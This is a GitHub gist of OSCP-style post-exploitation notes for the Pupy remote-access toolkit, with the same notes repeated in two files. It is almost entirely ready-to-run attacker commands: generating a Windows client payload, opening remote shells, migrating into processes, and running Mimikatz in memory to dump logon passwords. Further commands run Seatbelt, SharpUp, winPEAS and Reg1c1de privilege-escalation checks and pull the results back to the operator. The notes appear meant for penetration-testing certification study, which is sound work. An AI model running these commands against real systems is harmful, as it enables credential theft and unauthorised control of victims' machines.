Skip to content

Instantly share code, notes, and snippets.

@ssstonebraker

ssstonebraker/OSCP_Post_Exploitation.md

Last active June 13, 2023 19:06
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save ssstonebraker/922723a7586f4e601c586c320a6dee52 to your computer and use it in GitHub Desktop.
Save ssstonebraker/922723a7586f4e601c586c320a6dee52 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
OSCP_Post_Exploitation.md

Pupy Post Exploitation Toolkit Notes

link to project home: https://github.com/n1nj4sec/pupy

Create aliases - modify pupy.conf

Modify pupy.conf Under the section starting with [aliases] you can add them

[aliases]
[aliases]
info = get_info
pyexec = pyexec
exec = shell_exec
shell = interactive_shell
winshell = run interactive_shell
kill = process_kill
mount = drives
upload-priv = run upload "/home/kali/tools/win-priv/winpriv.zip"
mkadmin = run mkdir "c:\admin"
h = help
winshell = run interactive_shell
unzip-priv = run zip -u "c:\windows\temp\winpriv.zip"
unzip-priv-admin = run zip -u "c:\windows\temp\winpriv.zip" -d "C:\admin"
seatbelt-full = run --b shell_exec "c:\admin\seatbelt.exe all full > c:\windows\temp\seatbelt_full.txt"
seatbelt-all = run --b shell_exec "c:\admin\seatbelt.exe all > c:\windows\temp\seatbelt_all.txt"
dfull = run download "c:\windows\temp\seatbelt_full.txt"
dall = run download "c:\windows\temp\seatbelt_all.txt"
mimi32 = run --b shell_exec "c:\admin\mimikatz\win32\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\windows\temp\mimi32.txt"
mimi64 = run --b shell_exec "c:\admin\mimikatz\win64\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\windows\temp\mimi64.txt"

Client exploits

Windows x86

gen -O windows -A x86 -f client

Interface Usage

Processes

Show processes with owner

ps -i

Migrate to pid

migrate <pid>

Sessions

Show Sessions

sessions

Set Session to interact with

Set Session to interact with

session -i <id>

Shells

Windows

run interactive_shell

Linux

shell

Python

run -f 3 pyshell

Download a file

run download 'C:\Windows\System32\cmd.exe'

Upload a file

run upload '/home/kali/tools/win-priv/winPEAS32.exe'

Executables

upload and run another PE exe from memory

32 bit Mimikatz

run memory_exec /home/kali/tools/win-exe/mimikatz/win32/mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

64 bit Mimikatz

run memory_exec /home/kali/tools/win-exe/mimikatz/win64/mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

Remote Desktop

rdesktop -r 0

Run File

Inmemory

run memory_exec /home/kali/tools/win-priv/seatbelt.exe

Oneliner

run --b shell_exec "c:\windows\temp\seatbelt.exe all > c:\windows\temp\seatbelt_all.txt"

Download

run download "c:\windows\temp\seatbelt_all.txt"

Upload

run upload "/home/kali/tools/win-priv/seatbelt.exe"

Cred Dump

Mimikatz

run --b shell_exec "c:\admin\mimikatz\win32\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\admin\mimi32.txt"

Privesc Checks

Reg1c1de

Reg1c1de export HKLM writable keys

run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hklm.csv -r=HKLM -e"
run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hkcu.csv -r=HKCU -e"
run download "c:\admin\hklm_HKEY_LOCAL_MACHINE.csv"
run download "c:\admin\hkcu_HKEY_CURRENT_USER.csv"

run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hkcu.csv -r=HKCU -e"

Sharpup

run --b shell_exec "c:\admin\sharpup.exe > C:\admin\sharpup.txt"
run download "C:\admin\sharpup.txt"

Winpeas

run --b shell_exec "C:\admin\winpeas.bat > c:\admin\winpeas_output.txt"
run download "c:\admin\winpeas_output.txt"
Raw
OSCP_Post_Exploitation_Toolkits.md

Alternate Data Streams

dir /R
more < file.txt:root.txt:$DATA
streams.exe

Pupy Post Exploitation Toolkit Notes

link to project home: https://github.com/n1nj4sec/pupy

Create aliases - modify pupy.conf

Modify pupy.conf Under the section starting with [aliases] you can add them

[aliases]
[aliases]
info = get_info
pyexec = pyexec
exec = shell_exec
shell = interactive_shell
winshell = run interactive_shell
kill = process_kill
mount = drives
upload-priv = run upload "/home/kali/tools/win-priv/winpriv.zip"
mkadmin = run mkdir "c:\admin"
h = help
winshell = run interactive_shell
unzip-priv = run zip -u "c:\windows\temp\winpriv.zip"
unzip-priv-admin = run zip -u "c:\windows\temp\winpriv.zip" -d "C:\admin"
seatbelt-full = run --b shell_exec "c:\admin\seatbelt.exe all full > c:\windows\temp\seatbelt_full.txt"
seatbelt-all = run --b shell_exec "c:\admin\seatbelt.exe all > c:\windows\temp\seatbelt_all.txt"
dfull = run download "c:\windows\temp\seatbelt_full.txt"
dall = run download "c:\windows\temp\seatbelt_all.txt"
mimi32 = run --b shell_exec "c:\admin\mimikatz\win32\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\windows\temp\mimi32.txt"
mimi64 = run --b shell_exec "c:\admin\mimikatz\win64\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\windows\temp\mimi64.txt"

Client exploits

Windows x86

gen -O windows -A x86 -f client

Interface Usage

Processes

Show processes with owner

ps -i

Migrate to pid

migrate <pid>

Sessions

Show Sessions

sessions

Set Session to interact with

Set Session to interact with

session -i <id>

Shells

Windows

run interactive_shell

Linux

shell

Python

run -f 3 pyshell

Download a file

run download 'C:\Windows\System32\cmd.exe'

Upload a file

run upload '/home/kali/tools/win-priv/winPEAS32.exe'

Executables

upload and run another PE exe from memory

32 bit Mimikatz

run memory_exec /home/kali/tools/win-exe/mimikatz/win32/mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

64 bit Mimikatz

run memory_exec /home/kali/tools/win-exe/mimikatz/win64/mimikatz.exe privilege::debug sekurlsa::logonpasswords exit

Remote Desktop

rdesktop -r 0

Run File

Inmemory

run memory_exec /home/kali/tools/win-priv/seatbelt.exe

Oneliner

run --b shell_exec "c:\windows\temp\seatbelt.exe all > c:\windows\temp\seatbelt_all.txt"

Download

run download "c:\windows\temp\seatbelt_all.txt"

Upload

run upload "/home/kali/tools/win-priv/seatbelt.exe"

Cred Dump

Mimikatz

run --b shell_exec "c:\admin\mimikatz\win32\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit > c:\admin\mimi32.txt"

Privesc Checks

Reg1c1de

Reg1c1de export HKLM writable keys

run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hklm.csv -r=HKLM -e"
run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hkcu.csv -r=HKCU -e"
run download "c:\admin\hklm_HKEY_LOCAL_MACHINE.csv"
run download "c:\admin\hkcu_HKEY_CURRENT_USER.csv"

run --b shell_exec "C:\admin\Reg1c1de.exe -v -o=c:\admin\hkcu.csv -r=HKCU -e"

Sharpup

run --b shell_exec "c:\admin\sharpup.exe > C:\admin\sharpup.txt"
run download "C:\admin\sharpup.txt"

Winpeas

run --b shell_exec "C:\admin\winpeas.bat > c:\admin\winpeas_output.txt"
run download "c:\admin\winpeas_output.txt"

run --b shell_exec "c:\windows\temp\beroot.exe > c:\admin\beroot.txt"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment